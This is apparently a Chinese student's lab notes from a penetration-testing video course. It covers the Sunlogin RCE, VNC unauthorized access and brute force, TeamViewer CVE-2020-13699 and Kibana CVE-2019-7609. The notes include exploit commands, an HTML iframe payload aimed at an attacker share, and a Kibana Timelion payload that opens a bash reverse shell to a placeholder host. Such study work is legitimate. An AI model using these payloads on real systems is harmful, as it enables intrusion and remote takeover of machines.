权当备忘记录,存在许多不完善,日后补坑(大概~)
视频链接:
【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1pQ4y1s7kH
相关工具:
链接:https://pan.baidu.com/s/1gEVS1iSMKMkrmE_WHTbH-g
提取码:isok
一.知识点
1.远程控制-第三方应用安全
2.三方应用-向日葵&VNC&TV
3.设备平台-Zabbix&Kibana 漏洞
二.演示案例
1.远程控制-向日葵&Vnc&Teamviewer
2.设备平台-Zabbix-CVE-2022-23131
3.设备平台-Kibana-CVE-2019-7609
案例1:远程控制-向日葵&Vnc&Teamviewer
1.向日葵 CVE-2022-10270 远程代码执行漏洞
简介:向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。
影响版本:
向日葵个人版:windows <=11.0.0.33
向日葵简约版:<= v1.0.1.43315
下载好向日葵相关版本和exp,地址:https://github.com/Mr-xn/sunlogin_rce
确认在靶机安装好11.0.0.33826版本的向日葵
对靶机40000-60000之间的高位端口进行扫描,找到向日葵开启的存活可疑端口
xrkRce.exe -h ip -t scan
执行命令,可以看到靶机的敏感信息
xrkRce.exe -h ip -t rce -p port "command"
2.VNC 未授权访问漏洞
简介:VNC 全名Virtual Network Console(虚拟网络控制台),是基于 UNXI 和 Linux 的免费开源软件,由 VNC Server 和 VNC Viewer 两部分组成。默认端口号 5900。
靶机下载好VNC Server后,用kall进行端口扫描,可看到5900端口开放,vnc的信息也有显示
靶机打开VNC Server,若这里没设置身份验证的话,可以直接用VNC Viewer连接
VNC Viewer点击Connect
连接成功
若这里选择的是VNC password,会提示设置密码就没有用户名,若选择windows password,就需要靶机的用户和密码才能登录,前者可以使用hydra尝试爆破
设置VNC password
用字典尝试爆破,可以爆破出最后密码为123456abc
设置为Windows password,相当于得使用靶机用户名和密码才能登录
可以看到需要同时输入靶机用户名和密码才能登录
3.Teamviewer CVE-2020-13699
在本机新建一个html文件写入内容如下,启动phpstudy,将其放在phpstudy目录下让靶机可以访问。
<!DOCTYPE html>
<html>
<head>
<title>cve-2020-13699</title>
</head>
<body>
<p>Welcome to xiaodi!</p>
<iframe style="height:1px;width:1px;" src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body>
</html>
//其中src='teamviewer10: --play \\attacker-IP\share\fake.tvs'为恶意构造的代码,可以修改自己想要的执行命令
靶机访问http://192.168.190.1/TeamViewer.html,点击“打开链接”会自动启动靶机的TeamViewer。
案例2:设备平台-Zabbix-CVE-2022-23131
1.Zabbix CVE-2022-23131 登录绕过漏洞复现
简介:Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。是一款服务器监控软件,其由 server、agent、web 等模块组成,其中 web 模块由 PHP 编写,用来显示数据库中的结果。默认端口:10051。
这个漏洞一般的靶场没有,搭建又非常的麻烦。需通过某些手段进行复现,在fofa找了几圈都是已修复的,这里就看下其他博客学习思路。
案例3:设备平台-Kibana-CVE-2019-7609
1.Kibana CVE-2019-7609 远程代码执行漏洞
简介:Kibana 为 Elassticsearch 设计的一款开源的视图工具。其 5.6.15 和 6.6.1 之前的版本中存在一处原型链污染漏洞,利用漏洞可以在目标服务器上执行任意代码。默认端口:5601。
受影响版本:
Kibana < 5.6.15 Kibana < 6.6.1
打开vulhub的kibana,首先在kibana/CVE-2019-7609/目录下执行sysctl -w vm.max_map_count=262144命令,不然会出现Kibana server is not ready yet错误,之后执行docker-compose up -d启动容器,查看开放的端口为5601
访问url页面
kali进行端口监听
访问kibana,在Timelion模块输入shell,点击右边的三角形,反弹成功
//反弹shell
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/your-ip/your-ip-port 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')
//其中your-ip和your-ip-port为需要反弹主机的ip和端口
三.总结
此次涉及的内容为远程控制的第三方应用软件和一些设备平台,类似的利用思路都差不多。